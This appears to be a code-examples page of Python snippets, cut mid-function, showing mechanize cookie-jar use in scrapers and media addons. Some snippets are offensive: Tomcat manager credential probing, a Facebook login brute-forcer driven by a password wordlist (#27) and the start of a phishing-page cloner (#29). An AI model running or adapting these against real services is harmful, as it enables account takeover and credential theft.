def browseToManager(url, user, password):
    logger.debug('Browsing to "%s"... Creds: %s:%s' % (url, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    browser.add_password(url, user, password)

    error = None
    retry = False
    page = None
    try:
        page = browser.open(url)
    except urllib2.URLError, e:
        error = str(e)
        try:
            logger.debug('Failed with /manager/ trying with /manager/html')
            page = browser.open(url + 'html')
            logger.debug('Succeeded, most likely dealing with Tomcat6.')
            error = None
            url += 'html'
        except urllib2.URLError, e:
            if '403' in str(e):
                logger.debug('Got 403, most likely dealing with Tomcat6.')
                logger.error('Invalid credentials supplied for Apache Tomcat.')
                pass
            else:
                error = str(e)
    def __callRequest(self):
        cookieJar = mechanize.LWPCookieJar()
        try: #TODO ohne try evtl.
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)
        sParameters = urllib.urlencode(self.__aParameters)

        opener = mechanize.build_opener(SmartRedirectHandler,
                                        mechanize.HTTPEquivProcessor,
                                        mechanize.HTTPRefreshProcessor)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for aHeader in self.__aHeaderEntries:                
                for sHeaderKey, sHeaderValue in aHeader.items():
                    oRequest.add_header(sHeaderKey, sHeaderValue)
        cookieJar.add_cookie_header(oRequest)
        
        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent
        try:
            oResponse = opener.open(oRequest,timeout = 60)             
        except mechanize.HTTPError, e:
            if not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream','Fehler beim Abrufen der Url:',self.__sUrl, str(e))
                logger.error("HTTPError "+str(e)+" Url: "+self.__sUrl)
                return ''
            else:
                oResponse = e                 
示例#3
0
 def get_browser(self):
     if self.browser:
         return self.browser
     else:
         browser = mechanize.Browser()
         browser.set_handle_equiv(False)
         browser.set_handle_gzip(True)
         browser.set_handle_redirect(True)
         browser.set_handle_robots(False)
         browser.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                                    max_time=1)
         # browser.set_seekable_responses(False)
         if self.debug:
             browser.set_debug_http(True)
             browser.set_debug_redirects(True)
             browser.set_debug_responses(True)
         cj = mechanize.LWPCookieJar()
         try:
             cj.load(self.cookie_file,
                     ignore_discard=True,
                     ignore_expires=True)
         except IOError:
             pass
         browser.set_cookiejar(cj)
         browser.addheaders = [
             ('User-agent', self.user_agent),
         ]
         self.browser = browser
         return self.browser
示例#4
0
def init_browser():

    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)

    manager_url = "%s/manager/html" % URL

    browser.add_password(manager_url, USERNAME, PASSWORD)
    try:
        page = browser.open(manager_url)
    except:
        print("[-] Apache Tomcat not found")
        os._exit(0)

    data = page.read()
    m = re.search('Apache Tomcat/([^<]+)', data)

    if m:
        tomcatVersion = m.group(1)

    if not tomcatVersion:
        print("[-] Apache Tomcat not found")
        return False

    #print('[+] Apache Tomcat/%s' % (tomcatVersion))
    return browser
示例#5
0
    def __init__(self, usuario, senha):

        self.usuario = usuario
        self.senha = senha
        self.br = mechanize.Browser()
        cookiejar = mechanize.LWPCookieJar(
            "cookies.yml", 'ignore_discard="True",ignore_expired="True"')
        self.br.set_cookiejar(cookiejar)
        ##### Browser options #######
        self.br.set_handle_equiv(False)
        self.br.set_handle_gzip(False)
        self.br.set_handle_redirect(True)
        self.br.set_handle_referer(False)
        self.br.set_handle_robots(False)
        self.br.set_handle_refresh(
            False)  #mechanize._http.HTTPRefreshProcessor(), max_time=1)
        self.br.set_debug_http(True)
        self.br.set_debug_http(True)
        #self.br.set_debug_redirects(True)
        self.br.set_debug_responses(True)
        ########----------###########
        self.br.addheaders = [
            ('User-agent',
             'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
             ),
            ('Cache-Control',
             'no-store, no-cache, must-revalidate, post-check=0, pre=check=0'),
            ('Pragma', 'no-cache')
        ]
        #TODO buscar forma melhor de fazer o processo de cadastro das tags
        self.dic_temp = {
        }  # necessario para guardar informações para cadastro de tags
def browseToManager(host, url, user, password):
    error = None
    retry = False
    page = None

    baseurl = constructBaseUrl(host, url)
    managerurl = ''

    tomcat_suffixes = ['', 'manager', 'manager/html']
    error = None
    reached = False

    logger.debug('Browsing to "%s"... Creds: "%s:%s"' %
                 (baseurl, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    once = True

    for suffix in tomcat_suffixes:
        try:
            managerurl = os.path.join(baseurl, suffix)
            logger.debug('Trying to fetch: "%s"' % managerurl)
            browser.add_password(managerurl, user, password)
            page = browser.open(managerurl)

            data = page.read()
            m = re.search('Apache Tomcat/([^<]+)', data)
            if m:
                logger.debug('Probably found something: Apache Tomcat/%s' %
                             m.group(1))
                tomcatVersion = m.group(1)

            if validateManagerApplication(browser) and tomcatVersion:
                logger.debug(
                    'Apache Tomcat/%s Manager Application reached & validated.'
                    % (tomcatVersion))
                reached = True
                break

        except urllib2.URLError, e:
            error = str(e)
            if 'Connection refused' in error:
                logger.warning(
                    'Could not connect with "%s", connection refused.' %
                    managerurl)
            elif 'Error 401' in error or '403' in error:
                logger.warning(
                    'Invalid credentials supplied for Apache Tomcat.')
                return 403, 403
            elif once:
                once = False
                logger.warning('Browsing to the manager (%s) failed: \n\t%s' %
                               (baseurl, e))
                if ':' not in baseurl[baseurl.find('://') + 3:]:
                    logger.warning(
                        'Did you forgot to specify service port in the host argument (host:port)?'
                    )
示例#7
0
def themain():
    #browser=mechanize.Browser()
    #browser.open('http://www.baidu.com')
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)
    r = mechanize.urlopen('http://www.baidu.com')
    cj.save('cookie.txt', ignore_discard=True, ignore_expires=True)
    def setCookie(self, oCookie):
        cookieJar = mechanize.LWPCookieJar()
        try: #TODO ohne try evtl.
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        cookieJar.set_cookie(oCookie)

        cookieJar.save(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
 def export_cookies(self, req, fp, code, msg, headers):
     oRequest = cRequestHandler('dummy')
     resp = mechanize._response.closeable_response(fp, headers, req.get_full_url(), code, msg)
     cookieJar = mechanize.LWPCookieJar()
     try:
         cookieJar.load(oRequest._cookiePath)
     except Exception as e:
         logger.info(e)            
     cookieJar.extract_cookies(resp,req)  
     cookieJar.save(oRequest._cookiePath)
示例#10
0
def main():
    """ Program's entry point """
    try:
        web = None
        if len(sys.argv) < 4:
            print "Usage: " + sys.argv[0] + " code.ext out.xml website/problem"
            print
            print "ext = c | cpp | cc | java"
            print "website = livearchive | uva | tju | timus | spoj"
            print
            write_status('Too few arguments to valodator.py')
            sys.exit(1)

        with open(sys.argv[1]) as fcode:
            code = fcode.read()
        url = sys.argv[3]

        website, problem = recognize_problem(url)
        website = website.lower()
        language = recognize_language(sys.argv[1])

        cjar = mechanize.LWPCookieJar()
        if os.access(COOKIE_FILE, os.F_OK):
            cjar.load(COOKIE_FILE)

        # some weird exception pops up due to server's error,
        # and sometimes we get RetryableException
        for retry in xrange(10):
            try:
                browser = build_browser(cjar)
                print 'Website is ' + website
                web = build_web_judge(website, browser)
                status = web.get_verdict(problem, language, code)
                break
            except (httplib.HTTPException, RetryableException):
                web.cleanup_after_crash()
                stack = format_exception_info()
                print stack
                with open(LOG_FILE, 'a') as flog:
                    flog.write('Exception: ' + stack + '\n')
                if retry == 9:
                    write_status("Error, too many retryables.")
                    sys.exit(1)
                time.sleep(2)

        cjar.save(COOKIE_FILE, ignore_discard=True, ignore_expires=True)
        write_status(status)
    except Exception, exc:  #gotta catch 'em all, for logging purposes
        if web:
            web.cleanup_after_crash()
        stack = format_exception_info()
        print stack
        with open(LOG_FILE, 'a') as flog:
            flog.write('Exception: ' + stack + '\n')
        write_status(str(type(exc)) + " " + str(exc))
示例#11
0
    def __callRequest(self):
        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent

        cookieJar = mechanize.LWPCookieJar(filename=self._cookiePath)
        try:  # TODO ohne try evtl.
            cookieJar.load(ignore_discard=self.__bIgnoreDiscard,
                           ignore_expires=self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        sParameters = urllib.urlencode(self.__aParameters, True)

        handlers = [
            SmartRedirectHandler, mechanize.HTTPEquivProcessor,
            mechanize.HTTPRefreshProcessor
        ]
        if sys.version_info >= (2, 7, 9) and sys.version_info < (2, 7, 11):
            handlers.append(newHTTPSHandler)
        opener = mechanize.build_opener(*handlers)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for key, value in self.__headerEntries.items():
            oRequest.add_header(key, value)
        cookieJar.add_cookie_header(oRequest)

        user_agent = self.__headerEntries.get(
            'User-Agent',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
        )

        try:
            oResponse = opener.open(oRequest, timeout=self.requestTimeout)
        except mechanize.HTTPError, e:
            if e.code == 503 and e.headers.get("Server") == 'cloudflare-nginx':
                html = e.read()
                oResponse = self.__check_protection(html, user_agent,
                                                    cookieJar)
                if not oResponse:
                    logger.error("Failed to get CF-Cookie for Url: " +
                                 self.__sUrl)
                    return ''
            elif not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream', 'Fehler beim Abrufen der Url:',
                                    self.__sUrl, str(e))
                logger.error("HTTPError " + str(e) + " Url: " + self.__sUrl)
                return ''
            else:
                oResponse = e
示例#12
0
 def __init__(self):
     self._br = mechanize.Browser()
     self._cj = mechanize.LWPCookieJar()
     csrftoken = makeCsrf()
     self._cj.set_cookie(csrfCookie(csrftoken))
     self._br.set_handle_robots(False)
     self._br.set_cookiejar(self._cj)
     self._br.addheaders.append(('X-CSRFToken',csrftoken))
     self._br.addheaders.append(('Referer',base_url))
     self._logged_in = False
     self._fd = FileDownloader(config.YDL_PARAMS)
     self._fd.add_info_extractor(YoutubeIE())
    def getCookie(self, sCookieName):
        cookieJar = mechanize.LWPCookieJar()
        try: #TODO ohne try evtl.
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard, self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        for entry in cookieJar:
            if entry.name == sCookieName:
                return entry

        return False
示例#14
0
    def __init__(self, usid):
        self.usid = usid
        self.baseUrl = "http://userstyles.org"
        self.editUrl = self.baseUrl + "/styles/%d/edit" % usid

        self.cj = mechanize.LWPCookieJar()
        self.br = mechanize.Browser()
        self.br.set_cookiejar(self.cj)

        if os.path.exists(".userstylecookies.txt"):
            self.cj.load(".userstylecookies.txt",
                         ignore_discard=True,
                         ignore_expires=True)
示例#15
0
    def __init__(self, config):
        """Set up JARFILE and other housekeeping"""
        self.cookiejar = mechanize.LWPCookieJar()
        browser = self.mechanize = mechanize.Browser()
        browser.set_cookiejar(self.cookiejar)
        self.config = config

        # I guess we'll assume good until we get evidence otherwise...
        if JARFILE.exists():
            logging.debug("Loading jarfile: %s", str(JARFILE))
            self.cookiejar.load(JARFILE)
            browser.set_cookiejar(self.cookiejar)
        else:
            self.login()
示例#16
0
 def __init__(self):
     self.cj = mechanize.LWPCookieJar()
     opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(self.cj))
     mechanize.install_opener(opener)
     self.br = mechanize.Browser()
     self.br.set_cookiejar(self.cj)
     self.sessionkey = 'None'
     self.br.set_header(
         'User-Agent',
         value=
         'Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0'
     )
     # self.br.set_debug_http(True)
     self.br.set_debug_redirects(True)
示例#17
0
def setupBrowser():
    """
        Setup the browser which we use for login to facebook and scraping the source code
    """
    br = mechanize.Browser()
    cj = mechanize.LWPCookieJar()
    br.set_cookiejar(cj)
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    br.addheaders = [
        ('User-agent',
         'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0')
    ]
    return br
示例#18
0
def get_trash_zone(address, zip):
    #Make cookie jar.  See wwwsearch.sourceforge.dat/mechanize/hints.html
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)

    #Save cookies
    cj.save(
        "/usr/local/django/recyclocity/recyclocity_static/cookies/cookie_jar",
        ignore_discard=True,
        ignore_expires=True)

    #Create a browser
    browser = mechanize.Browser()

    #Fill in form
    browser.open('http://lmt-web.lowermerion.org/cgi-bin/refuse2.plx')
    browser.form = list(browser.forms())[0]
    browser.form['askrecycle'] = address
    browser.form['postcode'] = zip

    #Submit form
    browser.submit()

    #Extract content
    content = browser.response().read()

    #Use pattern match to extract fields
    m = re.search('<b>(Monday|Tuesday|Wednesday|Thursday|Friday)</b>', content)
    if m:
        day, = m.groups()
        #Convert day to number
        day_number = schedule_helpers.get_day_number(day)
    else:
        #Failed
        return

    m = re.search('<b>Zone ([1-4])</b>', content)
    if m:
        zone, = m.groups()
    else:
        #Failed
        return

    #Match for both day and zone
    return day_number, zone
示例#19
0
def loginAccount(email: str, password: str):
    br = getNewBrowser()
    # TODO: Fix loadCookies handling
    cookies = mechanize.LWPCookieJar(getCookiesPath())
    if email is None or password is None:
        print("Kein Zugangsdaten vorhanden...")
        return False, br
    elif cookies is not None and os.path.exists(getCookiesPath()):
        # Try to login via stored cookies first - Aral only allows one active session which means we will most likely have to perform a full login
        print('Login aral-supercard.de Account | ' + email)
        print('Versuche Login ueber zuvor gespeicherte Cookies ...')
        br.set_cookiejar(cookies)
    response = br.open(getBaseDomain())
    html = getHTML(response)
    logged_in = isLoggedIN(html)
    if not logged_in:
        if cookies is not None and os.path.exists(getCookiesPath()):
            print('Login ueber Cookies fehlgeschlagen --> Versuche vollstaendigen Login')
        else:
            print('Login aral-supercard.de Account | ' + email)
        br.open(getBaseDomain() + '/login')
        form_index = getFormIndexBySubmitKey(br, 'email')
        if form_index == -1:
            print('Login-Form konnte nicht gefunden werden')
            return False, br
        br.select_form(nr=form_index)
        br['email'] = email
        br['password'] = password
        response = br.submit()
        html = getHTML(response)
        if not isLoggedIN(html):
            print(
                'Login fehlgeschlagen - Ungueltige Zugangsdaten? Korrigiere deine eingetragenen Zugangsdaten in der Datei %s bevor du dieses Script wieder startest!' % getSettingsPath())
            return False, br
        print('Vollstaendiger Login erfolgreich')
        logged_in = True
    cookies = br._ua_handlers['_cookies'].cookiejar

    if cookies is not None:
        # Save cookies and logindata
        print('Speichere Cookies in ' + getCookiesPath())
        cookies.save()
    else:
        print('Keine Cookies zum Speichern vorhanden')
    return logged_in, br
示例#20
0
    def __callRequest(self):
        cookieJar = mechanize.LWPCookieJar()
        try:  #TODO ohne try evtl.
            cookieJar.load(self._cookiePath, self.__bIgnoreDiscard,
                           self.__bIgnoreExpired)
        except Exception as e:
            logger.info(e)

        sParameters = urllib.urlencode(self.__aParameters, True)

        handlers = [
            SmartRedirectHandler, mechanize.HTTPEquivProcessor,
            mechanize.HTTPRefreshProcessor
        ]
        if sys.version_info >= (2, 7, 9) and sys.version_info < (2, 7, 11):
            handlers.append(newHTTPSHandler)
        opener = mechanize.build_opener(*handlers)
        if (len(sParameters) > 0):
            oRequest = mechanize.Request(self.__sUrl, sParameters)
        else:
            oRequest = mechanize.Request(self.__sUrl)

        for key, value in self.__headerEntries.items():
            oRequest.add_header(key, value)
        cookieJar.add_cookie_header(oRequest)

        if self.caching and self.cacheTime > 0:
            sContent = self.readCache(self.getRequestUri())
            if sContent:
                return sContent

        try:
            oResponse = opener.open(oRequest, timeout=self.requestTimeout)
        except mechanize.HTTPError, e:
            if e.code == 503 and e.headers.get("Server") == 'cloudflare-nginx':
                oResponse, cookieJar = cCFScrape().resolve(
                    oRequest, e, cookieJar)
            elif not self.ignoreErrors:
                xbmcgui.Dialog().ok('xStream', 'Fehler beim Abrufen der Url:',
                                    self.__sUrl, str(e))
                logger.error("HTTPError " + str(e) + " Url: " + self.__sUrl)
                return ''
            else:
                oResponse = e
示例#21
0
def get_trash_zone(address, zip):

    #Make cookie jar.  See wwwsearch.sourceforge.dat/mechanize/hints.html
    cj = mechanize.LWPCookieJar()
    opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
    mechanize.install_opener(opener)

    #Create a browser
    browser = mechanize.Browser()

    #User-Agent (this is cheating, ok?)
    browser.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    #Save cookies
    cj.save(
        "/usr/local/django/recyclocity/recyclocity_static/cookies/cookie_jar",
        ignore_discard=True,
        ignore_expires=True)

    #Fill in form
    #browser.open('http://citymaps.phila.gov/portal/')
    #browser.select_form(name="form1")
    #browser.form['txtSearchAddress'] = address

    #Fill in form
    #browser.open('https://alpha.phila.gov/property/')
    #browser.open('http://www.lowermerion.org/cgi-bin/recycle2.plx/')
    browser.open(
        'http://www.lowermerion.org/services/public-works-department/refuse-and-recycling/how-to-determine-your-recycling-collection-day'
    )
    #browser.form = list(browser.forms())[0]
    #browser.form['askrecycle'] = address
    #browser.form['postcode'] = zip

    #Submit form
    #browser.submit()

    #Extract content
    content = browser.response().read()

    return content
 def __init__(self, num, keyword):
     self.num = num
     self.keyword = keyword
     self.br = Browser(factory=mechanize.RobustFactory())
     self.br.set_handle_robots(False)
     self.br.addheaders = [
         ('User-Agent', userAgent),
         ('Accept',
          'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
     ]
     self.cj = mechanize.LWPCookieJar()
     self.br.set_cookiejar(self.cj)
     self.br._factory.is_html = True
     self.br.set_handle_refresh(False)
     self.idletime = 0
     threading.Thread.__init__(self)
     self.url = ""
     self.depth = 0
     self.output = ""
示例#23
0
def browseToManager(url, user, password):
    logger.debug('Browsing to "%s"... Creds: %s:%s' % (url, user, password))
    browser = mechanize.Browser()
    cookiejar = mechanize.LWPCookieJar()
    browser.set_cookiejar(cookiejar)
    browser.set_handle_robots(False)
    browser.add_password(url, user, password)

    try:
        page = browser.open(url)
    except urllib2.URLError, e:
        if 'Connection refused' in str(e):
            logger.error('Could not connect with "%s", connection refused.' % url)
        elif 'Error 404' in str(e):
            logger.error('Server returned 404 Not Found on specified URL: %s' % url)
        elif 'Error 401' in str(e):
            logger.error('Invalid credentials supplied for Apache Tomcat.')
        else:
            logger.error('Browsing to the server (%s) failed: %s' % (url, e))
        return None
示例#24
0
    def setup_browser(self):
        # initiate browser connection
        br = mechanize.Browser()
        cj = mechanize.LWPCookieJar()
        br.set_cookiejar(cj)

        # Browser options
        br.set_handle_equiv(True)
        br.set_handle_gzip(True)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                              max_time=1)
        br.addheaders = [('User-agent', 'Chrome')]
        self.br = br

        self.check_login()

        return self
示例#25
0
    def __init__(self, username, password):
        mechanize.Browser.__init__(self)
        cj = mechanize.LWPCookieJar()
        self.set_cookiejar(cj)
        self.set_handle_equiv(True)
        self.set_handle_redirect(True)
        self.set_handle_referer(True)
        self.set_handle_robots(False)
        self.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
        )]
        self.open(self.base_url)

        self.username = username
        self.password = password
        self.login()

        opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cj))
        mechanize.install_opener(opener)
示例#26
0
def login(username,password):
    print "[-] LOGIN"
    print "[+] username : "******"[+] password : "******"https://m.facebook.com/")
    br.select_form(nr=0)
    br.form['email'] = username
    br.form['pass'] = password
    br.submit()
    print "[-] SUCCESS LOGIN"
    return br
示例#27
0
def run(email, wordlist, agent, timeout):
	now = time.strftime("%X")
	print (LEGAL_DISCLAIMER)
	print ("\n[*] starting at %s\n" % now)
	url = "https://www.facebook.com/login.php?login_attempt=1"
	regexp = re.compile(re.findall("/(.*)\?", url)[0])
	cj = mechanize.LWPCookieJar()
	br = mechanize.Browser()
	br.set_handle_robots(False)
	br.set_handle_equiv(True)
	br.set_handle_referer(True)
	br.set_handle_redirect(True)
	br.set_handle_refresh(mechanize.HTTPRefreshProcessor(), max_time=1)
	br.set_cookiejar(cj); cj.clear()
	br.addheaders = [('User-agent', agent)]
	br.open(url, timeout=timeout)
	form = br.forms()[0]
	fp = open(wordlist, "rb")
	wordlist = fp.readlines()
	print ("\033[01;34m")
	msg = "target: " + email; logger.info(msg)
	msg = "wordlist: %d password" % len(wordlist); logger.info(msg)
	print ("\033[0m")
	while len(wordlist) <> 0:
		password = wordlist.pop(0).strip()
		msg = "trying credential => {0}:{1}".format(email, password); logger.info(msg)
		form["email"] = email
		form["pass"] = password
		response = br.open(form.click(), timeout=timeout)
		_url = response.geturl()
		if not regexp.search(_url) or regexp.pattern not in _url:
			print ("\033[01;32m")
			msg = "valid credential: "; logger.info(msg)
			msg = "email|id: " + email; logger.debug(msg)
			msg = "password: "******"\033[0m")
			raise SystemExit

	msg = "password valid tidak ditemukan di wordlist anda: " + fp.name; logger.critical(msg)
示例#28
0
    def cookie_jar(self):
        cj = getattr(self, '_cookie_jar', None)

        if cj is None:
            cj = mechanize.LWPCookieJar(Zone.cookie_fname)

            if self.use_cookies:
                try:
                    cj.load()
                except IOError:
                    pass

            def save_cookies():
                if self.use_cookies:
                    Zone.status(self, "Saving cookies to " + Zone.cookie_fname)
                    cj.save()
                    Zone.success(self)

            atexit.register(save_cookies)
            self._cookie_jar = cj

        return cj
示例#29
0
# Create a mechanized browser to connect to the phish target and grab the response
browse = mechanize.Browser()
browse.set_handle_robots(False)

# Determine if user agent was set,
# if so then set argument, otherwise it is empty
if args['useragent'] is not None:
    uafile = open(args['useragent'], 'r')
    uaheader = uafile.readline()
    browse.addheaders = [('User-Agent', uaheader)]
    uafile.close()

# if sendcookies option was enabled, then connect,
# grab the cookies, and use them in the second connection
if args['sendcookies'] == 1:
    cookies = mechanize.LWPCookieJar()
    browse.set_cookiejar(cookies)
    browse.open(phishsource)

browse.open(phishsource)
phishpage = browse.response().read()
browse.close()

# Use Beautiful soup to handle the HTML response
soup = BeautifulSoup(phishpage, "lxml")

# If autopwn has been configured, implement functionality
if args['autopwn'] is not None:
    # First perform regex to make sure halfway proper link was submitted
    if re.search('^(http|https)\:\/\/[a-zA-Z0-9]+', args['autopwn']):
        # Build frame for HTML response and store in BeautifulSoup object
示例#30
0
 def getNewToken(self):
     import mechanize #@UnresolvedImport
     br = mechanize.Browser()
     __addon__ = xbmcaddon.Addon(id='script.facebook.media')
     cookiesPath = os.path.join(xbmc.translatePath(__addon__.getAddonInfo('profile')),'cache','cook​ies')
     LOG('Cookies will be saved to: ' + cookiesPath)
     cookies = mechanize.LWPCookieJar(cookiesPath)
     if os.path.exists(cookiesPath): cookies.load()
     self.cookieJar = cookies
     opener = mechanize.build_opener(mechanize.HTTPCookieProcessor(cookies))
     mechanize.install_opener(opener)
     br.set_cookiejar(self.cookieJar)
     br._ua_handlers["_cookies"].cookiejar.clear()
     br.set_handle_robots(False)
     agent = 'XBMC/{0} Facebook-Media/{1}'.format(xbmc.getInfoLabel('System.BuildVersion'),self.version)
     LOG('Setting User Agent: {0}'.format(agent))
     br.addheaders = [('User-agent',agent)]
     scope = ''
     if self.scope: scope = '&scope=' + self.scope
     url =     'https://www.facebook.com/dialog/oauth?client_id='+self.client_id+\
             '&redirect_uri='+self.redirect+\
             '&type=user_agent&display=popup'+scope
     LOG(url)
     try:
         res = br.open(url)
         html = res.read()
     except:
         LOG("ERROR: TOKEN PAGE INITIAL READ")
         raise
     
     script = False
     try:
         #check for login form
         br.select_form(nr=0)
         LOG("HTML")
     except:
         self.genericError()
         script = True
         LOG("SCRIPT")
         
     if script:
         #no form, maybe we're logged in and the token is in javascript on the page
         url = res.geturl()
         token = self.extractTokenFromURL(url)
         if not token: token = self.parseTokenFromScript(html)
     else:
         try:
             #fill out the form and submit
             br['email'] = self.login_email
             br['pass'] = self.login_pass
             res = br.submit()
             url = res.geturl()
             LOG("FORM")
         except:
             LOG("FORM ERROR")
             raise
             
         script = False
         token = self.extractTokenFromURL(url)
         html = self.browserRead(res,'-noscript')
         if not token:
             #if 'class="checkpoint"' in html:
             token = self.handleLoginNotificationCrap(br)
             
         if not token: script = True
         
         if script:
             LOG("SCRIPT TOKEN")
             #no token in the url, let's try to parse it from javascript on the page
             try:
                 __addon__ = xbmcaddon.Addon(id='script.facebook.media')
                 htmlFile = os.path.join(xbmc.translatePath(__addon__.getAddonInfo('profile')),'cache','DEBU​G_HTML.html')
                 open(htmlFile,'w').write(html)
                 LOG('html output written to: ' + htmlFile)
             except:
                 pass
             token = self.parseTokenFromScript(html)
             token = urllib.unquote(token.decode('unicode-escape'))
     
     if not self.tokenIsValid(token):
         #if script: LOG("HTML:" + html)
         return False
     LOG("\n|--------------------\n|TOKEN: %s\n|--------------------"  % token)
     self.saveToken(token)
     if self.cookieJar is not None:
         self.cookieJar.save()
     return token